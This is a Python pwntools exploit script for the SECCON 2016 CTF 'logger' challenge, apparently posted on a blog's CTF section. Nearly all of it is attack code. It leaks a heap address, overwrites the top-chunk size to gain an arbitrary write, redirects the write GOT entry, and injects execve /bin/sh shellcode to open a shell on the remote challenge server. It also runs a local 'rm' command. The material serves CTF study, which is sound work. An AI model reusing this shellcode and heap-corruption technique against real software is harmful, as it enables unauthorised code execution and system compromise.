'''
with zzoru.
extreamly LIBC-specific exploit.
1/16 chance to get shell.
'''
from pwn import *
import os
import random
DEBUG = True
context(os='linux',arch='amd64')
#p1 = process("./logger")
p1 = remote('logger.pwn.seccon.jp', 6565)
#p2 = process("./logger")
p2 = remote('logger.pwn.seccon.jp', 6565)
R = str(random.randrange(10000))
def login(process):
global R
name = 'zzoru'+R
password = 'zzoru5'+R
process.sendline('1')
process.recvuntil('Name :')
process.sendline(name)
process.recvuntil('Password:')
process.sendline(password)
process.recvuntil('4. exit')
def debug(process, address):
gdb.attach(process, 'b *0x%x' % address)
raw_input()
def read_log(process):
process.sendline('1')
print '=== log ==='
#print process.recvuntil('1. Readlog')
print process.recv(4096)
def write_log(process,size, log):
process.sendline('2')
process.recvuntil('Log size(max 128byte):')
process.sendline(str(size))
if size > 0:
process.sendline(log)
#process.recvuntil('4.exit')
def buf_leak(process):
process.sendline('3')
process.recvuntil('4. exit')
process.recvline()
process.sendline('3')
process.recvuntil('filename: ')
print '[+] filename : %s ' % process.recv(32)
# leak = process.recv(8)
# if len(leak) == 8:
# buf = u64(leak)
# print 'buf addr: = 0x%x' % buf
# return buf
# else:
# print 'leak error ' + enhex(leak)
leak = process.recv(4)
print enhex(leak)
if leak[3] != '\x3d':
buf = u32(leak)
else:
buf = u32(leak[0:3]+'\x00')
print 'buf addr: = 0x%x' % buf
return buf
write_got = 0x602020
shell_code = "\x48\x31\xC0\x48\x31\xD2\x50\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x48\x89\xE7\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05"
os.system('rm /tmp/logger/*')
#p1 = process('./logger')
p1 = remote('logger.pwn.seccon.jp', 6565)
login(p1)
#write_log(p1, 128, p64(write_got+0x8) + shell_code + '\x90' * (128-8-len(shell_code)))
payload = p64(0x41414141)
payload += p64(0x42424242)
payload += p64(0x43434343)
payload += p64(0x602040)
payload += (shell_code + 'z'*(72-len(shell_code)))
payload += '\x20\xa4'
#payload += shell_code
write_log(p1, 128, payload + '\x00' * (128-len(payload)))
write_log(p1, 128, 'b' * 128)
#write_log(p1, -1, 'A')
#p1.interactive()
p1.recvline()
p1.close()
sleep(.1)
#p1 = process('./logger')
p1 = remote('logger.pwn.seccon.jp', 6565)
#p2 = process('./logger')
p2 = remote('logger.pwn.seccon.jp', 6565)
login(p1)
login(p2)
topchunk_size = 0xffffffffffffffff
buf_addr = buf_leak(p2)
write_log(p1, 32, pack(topchunk_size) + pack(topchunk_size))
sleep(.5)
read_log(p2)
print hex(buf_addr)
sleep(.5)
write_log(p2, write_got-8*2-buf_addr-0x100-0x10, 'AAAA' )
p2.sendline('1')
p2.sendline('ls -al')
p2.interactive()
'Games > CTF' 카테고리의 다른 글
| SECCON 2016 cheer_msg (0) | 2016.12.12 |
|---|---|
| SECCON 2016 checker (0) | 2016.12.12 |
| SECCON 2016 jumper (0) | 2016.12.11 |
| SECCON 2016 chat (0) | 2016.12.11 |
| Tokyo Westerns MMA CTF 2016 interpreter (0) | 2016.09.05 |